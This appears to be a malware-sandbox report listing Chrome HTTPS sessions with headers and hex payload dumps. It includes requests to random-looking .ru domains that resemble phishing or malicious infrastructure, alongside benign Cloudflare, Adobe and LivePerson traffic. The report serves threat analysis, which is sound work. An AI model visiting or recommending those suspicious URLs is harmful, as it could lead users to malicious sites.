                                                                                                                                                                                                                                                          24192.168.2.549780104.18.94.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:36:10 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/646785597:1734736264:AViGtQzSaaabc8hrjDXP21IkLtA_JA6kCdlbd7_lW4U/8f53738f5cfa15bb/Z6QE2UCD8GP1ik6GkC.hfElbKlamBauzDmHzwaBFQLs-1734737753-1.1.1.1-9mi5jcAkowfj88LcB7QDKM3IIlqsh0_ISo9UR_Wu85cb0Ya_9q16gt77fpCmc6aN HTTP/1.1
                                                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:36:11 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:36:11 GMT
                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                          Content-Length: 7
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                          cf-chl-out: Q1HCreE2AIe3HaCa1s1vCmLo9GZoDuif7LA=$ZUtEN0WpFGGHPseD
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f5373fe1b9642ad-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          2024-12-20 23:36:11 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                                                          Data Ascii: invalid


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          25192.168.2.549785172.67.158.684433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:36:12 UTC678OUTGET /ZATfZymFloKYOUYHhMIPbYQbYmLCVGEUSJTYXKLELYVOVSTVWWBDRAXVWRBSWFMJQXZNOKQCTXW HTTP/1.1
                                                                                                                                                                                                                                                          Host: qyirfeifkmxfpzq40aunypu4fmz8ucnejoritjokcewctv5c9qybgue.lpliwptf.ru
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Origin: https://gadk.quantumdhub.ru
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Referer: https://gadk.quantumdhub.ru/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:36:13 UTC887INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:36:13 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jZ1IzGfZxtfIwoISJ36IviDFnHdOEN0sxAs7SfelBecWJKc4LUGuEt8rdlqIlSnhj3iRxsqiASkoI37lDtXNr0uqH8pDjnNeAoux0wlwJWlNmwONunGbvfMAzl4ZSICGCdHeZ7wjU%2BCBCB26eJctbIc4pyN6WeFsokh2qEPJX%2FlpVtVxwx1kQV2%2FJSyF5RaaToBtl3A3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f5374079cc742d7-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2166&min_rtt=2127&rtt_var=825&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1256&delivery_rate=1372825&cwnd=245&unsent_bytes=0&cid=6037765be33f1563&ts=1092&x=0"
                                                                                                                                                                                                                                                          2024-12-20 23:36:13 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 11
                                                                                                                                                                                                                                                          2024-12-20 23:36:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          26192.168.2.549797104.21.73.564433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:36:16 UTC466OUTGET /ZATfZymFloKYOUYHhMIPbYQbYmLCVGEUSJTYXKLELYVOVSTVWWBDRAXVWRBSWFMJQXZNOKQCTXW HTTP/1.1
                                                                                                                                                                                                                                                          Host: qyirfeifkmxfpzq40aunypu4fmz8ucnejoritjokcewctv5c9qybgue.lpliwptf.ru
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:36:17 UTC893INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:36:17 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UR5FKSTAuhmsEf%2FdHM8bTYm%2BqsTtM2UZh%2BAs05c9HGxtC3uJTHQpMaZVPd9h4RYidlipcHPBnpSJLHOZWknRiql8SO3hEI3BovQVJrXPmMaNA7BMBYYNl7BxnTUUiYn76Ee%2BtxkSC6icQWrSOPFRdvkNmuwUqTW91KCIo5eVUvzIOipr%2F7tF3%2F4YfPkmhZKny3qkrNas"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f53741f0fc4c32c-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1483&rtt_var=581&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1044&delivery_rate=1843434&cwnd=171&unsent_bytes=0&cid=d510a8d7c85df386&ts=1104&x=0"
                                                                                                                                                                                                                                                          2024-12-20 23:36:17 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 11
                                                                                                                                                                                                                                                          2024-12-20 23:36:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          27192.168.2.55008452.212.192.254433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:37:01 UTC721OUTGET /id?d_visid_ver=4.4.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_orgid=EA76ADE95776D2EC7F000101%40AdobeOrg&d_nsid=0&ts=1734737818811 HTTP/1.1
                                                                                                                                                                                                                                                          Host: dpm.demdex.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Origin: https://www.microsoft.com
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                          Referer: https://www.microsoft.com/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:37:01 UTC823INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:37:01 GMT
                                                                                                                                                                                                                                                          Content-Type: application/json;charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 6666
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          X-TID: lCtW6vuHT/A=
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                          Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                          Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                          P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://www.microsoft.com
                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                          DCS: dcs-prod-irl1-2-v069-0c7c4700d.edge-irl1.demdex.com 3 ms
                                                                                                                                                                                                                                                          set-cookie: demdex=65697634601447774650234603073451317819; Max-Age=15552000; Expires=Wed, 18 Jun 2025 23:37:01 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None
                                                                                                                                                                                                                                                          2024-12-20 23:37:01 UTC6666INData Raw: 7b 22 64 5f 6d 69 64 22 3a 22 36 35 39 35 35 39 36 30 30 38 34 35 36 33 36 34 35 33 34 30 32 38 30 37 30 36 32 31 33 35 36 38 38 35 32 37 38 38 22 2c 22 69 64 5f 73 79 6e 63 5f 74 74 6c 22 3a 36 30 34 38 30 30 2c 22 64 5f 62 6c 6f 62 22 3a 22 36 47 31 79 6e 59 63 4c 50 75 69 51 78 59 5a 72 73 7a 5f 70 6b 71 66 4c 47 39 79 4d 58 42 70 62 32 7a 58 35 64 76 4a 64 59 51 4a 7a 50 58 49 6d 64 6a 30 79 22 2c 22 64 63 73 5f 72 65 67 69 6f 6e 22 3a 36 2c 22 64 5f 6f 74 74 6c 22 3a 37 32 30 30 2c 22 69 62 73 22 3a 5b 7b 22 69 64 22 3a 22 34 31 31 22 2c 22 74 74 6c 22 3a 31 30 30 38 30 2c 22 74 61 67 22 3a 22 69 6d 67 22 2c 22 66 69 72 65 55 52 4c 53 79 6e 63 22 3a 31 2c 22 73 79 6e 63 4f 6e 50 61 67 65 22 3a 31 2c 22 75 72 6c 22 3a 5b 22 2f 2f 63 6d 2e 65 76 65 72
                                                                                                                                                                                                                                                          Data Ascii: {"d_mid":"65955960084563645340280706213568852788","id_sync_ttl":604800,"d_blob":"6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y","dcs_region":6,"d_ottl":7200,"ibs":[{"id":"411","ttl":10080,"tag":"img","fireURLSync":1,"syncOnPage":1,"url":["//cm.ever


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          28192.168.2.55009618.66.161.1174433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:37:03 UTC576OUTGET /microsoft/lp_ada_enhancements-prod.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: static-assets.fs.liveperson.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                          Referer: https://publisher.liveperson.net/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:37:04 UTC500INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                                                                                          Content-Length: 344673
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:37:04 GMT
                                                                                                                                                                                                                                                          Last-Modified: Thu, 21 Nov 2024 14:58:42 GMT
                                                                                                                                                                                                                                                          ETag: "c14f93e32185a9f2f08d1896bb19de6e"
                                                                                                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                          Via: 1.1 4b9c4f1584ced8efb82794c07e3d29f2.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: BAH52-C1
                                                                                                                                                                                                                                                          X-Amz-Cf-Id: Otu68N5U8l11VTeHEVsfbgoTLGrGdixLSj6Tfz4pIVGxp3qBFhaG-A==
                                                                                                                                                                                                                                                          2024-12-20 23:37:04 UTC15884INData Raw: 76 61 72 20 65 6e 67 61 67 65 6d 65 6e 74 46 69 78 20 3d 20 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 76 61 72 20 65 6e 67 45 6c 3b 0a 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 66 6f 63 75 73 28 65 6e 67 29 20 7b 0a 20 20 20 20 20 20 20 20 2f 2f 4a 61 69 6d 65 20 4d 52 20 74 65 73 74 20 63 68 61 6e 67 65 20 73 65 74 74 69 6e 67 20 75 70 73 74 72 65 61 6d 0a 20 20 20 20 20 20 20 20 2f 2f 20 52 75 6e 20 69 66 20 61 20 62 75 74 74 6f 6e 20 77 61 73 20 64 65 74 65 63 74 65 64 0a 20 20 20 20 20 20 20 20 69 66 20 28 65 6e 67 2e 65 6e 67 61 67 65 6d 65 6e 74 54 79 70 65 20 3d 3d 3d 20 35 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 4c 6f 6f 6b 20 69 6e 20 64 6f 6d 20 66 6f 72 20 61 20 72 6f 6c 65 20 6f 66 20 62 75 74 74 6f 6e 2e 20 20
                                                                                                                                                                                                                                                          Data Ascii: var engagementFix = (function () { var engEl; function focus(eng) { //Jaime MR test change setting upstream // Run if a button was detected if (eng.engagementType === 5) { // Look in dom for a role of button.
                                                                                                                                                                                                                                                          2024-12-20 23:37:04 UTC106INData Raw: 65 20 27 73 74 6f 72 65 2d 70 6f 73 74 73 61 6c 65 73 2d 74 68 2d 74 68 27 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 27 77 65 62 70 75 72 63 68 61 73 65 2d 73 61 6c 65 73 2d 54 48 2d 54 48 27 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 27 73 74 6f 72 65 2d 6d 33 36 35 2d 74 68 2d 74 68 27
                                                                                                                                                                                                                                                          Data Ascii: e 'store-postsales-th-th': case 'webpurchase-sales-TH-TH': case 'store-m365-th-th'
                                                                                                                                                                                                                                                          2024-12-20 23:37:04 UTC1008INData Raw: 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 27 73 74 6f 72 65 2d 6d 33 36 35 2d 74 68 2d 77 77 27 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 27 6f 66 66 69 63 65 33 36 35 2d 6c 65 61 64 67 65 6e 2d 74 68 2d 74 68 27 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 27 73 74 6f 72 65 2d 73 61 6c 65 73 2d 74 68 2d 77 77 27 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 52 41 54 45 2e 6c 61 62 65 6c 2e 70 75 73 68 28 64 65 63 6f 64 65 55 52 49 28 27 25 45 30 25 42 39 25 38 34 25 45 30 25 42 38 25 41 31 25 45 30 25 42 39 25 38 38 25 45 30 25 42 38 25 39 45 25 45 30 25 42 38 25 41 44 25 45 30 25 42 39 25 38 33 25 45 30 25 42 38 25 38 38 25 45 30 25 42 38 25 41 31 25 45 30 25 42 38 25 42 32 25 45 30 25 42 38 25 38 31 27
                                                                                                                                                                                                                                                          Data Ascii: : case 'store-m365-th-ww': case 'office365-leadgen-th-th': case 'store-sales-th-ww': RATE.label.push(decodeURI('%E0%B9%84%E0%B8%A1%E0%B9%88%E0%B8%9E%E0%B8%AD%E0%B9%83%E0%B8%88%E0%B8%A1%E0%B8%B2%E0%B8%81'
                                                                                                                                                                                                                                                          2024-12-20 23:37:04 UTC12792INData Raw: 45 30 25 42 39 25 38 38 25 45 30 25 42 38 25 39 45 25 45 30 25 42 38 25 41 44 25 45 30 25 42 39 25 38 33 25 45 30 25 42 38 25 38 38 25 45 30 25 42 38 25 41 31 25 45 30 25 42 38 25 42 32 25 45 30 25 42 38 25 38 31 27 29 2c 20 64 65 63 6f 64 65 55 52 49 28 27 25 45 30 25 42 38 25 41 41 25 45 30 25 42 38 25 41 44 25 45 30 25 42 38 25 38 37 25 45 30 25 42 38 25 38 38 25 45 30 25 42 38 25 42 32 25 45 30 25 42 38 25 38 31 25 45 30 25 42 38 25 41 42 25 45 30 25 42 39 25 38 39 25 45 30 25 42 38 25 42 32 25 45 30 25 42 38 25 39 34 25 45 30 25 42 38 25 42 32 25 45 30 25 42 38 25 41 37 25 32 30 25 45 30 25 42 38 25 38 34 25 45 30 25 42 39 25 38 38 25 45 30 25 42 38 25 41 44 25 45 30 25 42 38 25 39 39 25 45 30 25 42 38 25 38 32 25 45 30 25 42 39 25 38 39 25 45 30 25
                                                                                                                                                                                                                                                          Data Ascii: E0%B9%88%E0%B8%9E%E0%B8%AD%E0%B9%83%E0%B8%88%E0%B8%A1%E0%B8%B2%E0%B8%81'), decodeURI('%E0%B8%AA%E0%B8%AD%E0%B8%87%E0%B8%88%E0%B8%B2%E0%B8%81%E0%B8%AB%E0%B9%89%E0%B8%B2%E0%B8%94%E0%B8%B2%E0%B8%A7%20%E0%B8%84%E0%B9%88%E0%B8%AD%E0%B8%99%E0%B8%82%E0%B9%89%E0%
                                                                                                                                                                                                                                                          2024-12-20 23:37:04 UTC16384INData Raw: 69 6d 70 72 6f 76 25 43 33 25 41 31 76 65 6c 27 29 2c 20 64 65 63 6f 64 65 55 52 49 28 27 54 72 25 43 33 25 41 41 73 25 32 30 65 73 74 72 65 6c 61 73 25 32 30 65 6d 25 32 30 63 69 6e 63 6f 25 33 42 25 32 30 6e 65 6d 25 32 30 70 72 6f 76 25 43 33 25 41 31 76 65 6c 25 32 30 6e 65 6d 25 32 30 69 6d 70 72 6f 76 25 43 33 25 41 31 76 65 6c 27 29 2c 20 64 65 63 6f 64 65 55 52 49 28 27 51 75 61 74 72 6f 25 32 30 65 73 74 72 65 6c 61 73 25 32 30 65 6d 25 32 30 63 69 6e 63 6f 25 33 42 25 32 30 61 6c 67 6f 25 32 30 70 72 6f 76 25 43 33 25 41 31 76 65 6c 27 29 2c 20 64 65 63 6f 64 65 55 52 49 28 27 43 69 6e 63 6f 25 32 30 65 73 74 72 65 6c 61 73 25 32 30 65 6d 25 32 30 63 69 6e 63 6f 25 33 42 25 32 30 6d 75 69 74 6f 25 32 30 70 72 6f 76 25 43 33 25 41 31 76 65 6c 27
                                                                                                                                                                                                                                                          Data Ascii: improv%C3%A1vel'), decodeURI('Tr%C3%AAs%20estrelas%20em%20cinco%3B%20nem%20prov%C3%A1vel%20nem%20improv%C3%A1vel'), decodeURI('Quatro%20estrelas%20em%20cinco%3B%20algo%20prov%C3%A1vel'), decodeURI('Cinco%20estrelas%20em%20cinco%3B%20muito%20prov%C3%A1vel'
                                                                                                                                                                                                                                                          2024-12-20 23:37:04 UTC5640INData Raw: 41 39 6c 6d 25 43 33 25 41 39 6e 79 65 6b 25 32 30 61 6c 61 70 6a 25 43 33 25 41 31 6e 25 32 30 6d 65 6e 6e 79 69 72 65 25 32 30 76 61 6c 25 43 33 25 42 33 73 7a 25 43 33 25 41 44 6e 25 43 35 25 42 31 27 29 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 27 73 74 6f 72 65 2d 73 61 6c 65 73 2d 68 65 2d 69 6c 27 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 27 73 74 6f 72 65 2d 70 6f 73 74 73 61 6c 65 73 2d 68 65 2d 69 6c 27 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 27 6f 66 66 69 63 65 33 36 35 2d 6c 65 61 64 67 65 6e 2d 68 65 2d 69 6c 27 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 27 77 65 62 70 75 72 63 68 61 73 65 2d 73 61 6c 65 73
                                                                                                                                                                                                                                                          Data Ascii: A9lm%C3%A9nyek%20alapj%C3%A1n%20mennyire%20val%C3%B3sz%C3%ADn%C5%B1'); break; case 'store-sales-he-il': case 'store-postsales-he-il': case 'office365-leadgen-he-il': case 'webpurchase-sales
                                                                                                                                                                                                                                                          2024-12-20 23:37:04 UTC12792INData Raw: 71 25 32 30 25 33 42 25 32 30 70 6c 75 74 25 43 33 25 42 34 74 25 32 30 73 61 74 69 73 66 61 69 74 27 29 2c 20 64 65 63 6f 64 65 55 52 49 28 27 43 69 6e 71 25 32 30 25 43 33 25 41 39 74 6f 69 6c 65 73 25 32 30 73 75 72 25 32 30 63 69 6e 71 25 32 30 25 33 42 25 32 30 74 72 25 43 33 25 41 38 73 25 32 30 73 61 74 69 73 66 61 69 74 27 29 29 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 52 41 54 45 5f 4e 50 53 2e 6c 61 62 65 6c 2e 70 75 73 68 28 64 65 63 6f 64 65 55 52 49 28 27 54 72 25 43 33 25 41 38 73 25 32 30 69 6d 70 72 6f 62 61 62 6c 65 27 29 2c 20 64 65 63 6f 64 65 55 52 49 28 27 50 6c 75 74 25 43 33 25 42 34 74 25 32 30 69 6d 70 72 6f 62 61 62 6c 65 27 29 2c 20 27 4e 69 20 70 72 6f 62 61 62 6c 65 2c 20 6e 69 20 69 6d 70 72 6f 62 61 62 6c 65
                                                                                                                                                                                                                                                          Data Ascii: q%20%3B%20plut%C3%B4t%20satisfait'), decodeURI('Cinq%20%C3%A9toiles%20sur%20cinq%20%3B%20tr%C3%A8s%20satisfait')); RATE_NPS.label.push(decodeURI('Tr%C3%A8s%20improbable'), decodeURI('Plut%C3%B4t%20improbable'), 'Ni probable, ni improbable
                                                                                                                                                                                                                                                          2024-12-20 23:37:04 UTC4616INData Raw: 63 61 72 64 5f 5f 74 65 78 74 20 6c 70 63 5f 64 65 73 6b 74 6f 70 27 29 5b 30 5d 0a 20 20 20 20 20 20 20 20 63 61 72 64 46 6f 63 75 73 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 74 61 62 69 6e 64 65 78 27 2c 20 30 29 3b 0a 20 20 20 20 20 20 20 20 63 61 72 64 46 6f 63 75 73 2e 66 6f 63 75 73 28 29 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 73 74 61 72 73 49 6e 69 74 28 72 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 63 68 69 70 73 52 6f 77 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 2e 63 68 69 70 73 2d 72 6f 77 27 29 3b 0a 20 20 20 20 20 20 20 20 69 66 20 28 63 68 69 70 73 52 6f 77 20 21 3d 20 6e 75 6c 6c 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 68 69 70 73 52 6f 77 2e 73
                                                                                                                                                                                                                                                          Data Ascii: card__text lpc_desktop')[0] cardFocus.setAttribute('tabindex', 0); cardFocus.focus(); } function starsInit(rate) { var chipsRow = document.querySelector('.chips-row'); if (chipsRow != null) { chipsRow.s
                                                                                                                                                                                                                                                          2024-12-20 23:37:04 UTC16384INData Raw: 65 78 5d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 75 74 74 6f 6e 2e 6f 6e 66 6f 63 75 73 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 63 75 73 28 69 6e 64 65 78 2c 20 72 61 74 65 2e 6c 61 62 65 6c 5b 69 6e 64 65 78 5d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 75 74 74 6f 6e 2e 6f 6e 63 6c 69 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 65 6c 65 74 65 50 6f 70 75 70 28 29 3b 0a 20 20 20
                                                                                                                                                                                                                                                          Data Ascii: ex]); }; button.onfocus = function () { focus(index, rate.label[index]); }; button.onclick = function () { deletePopup();
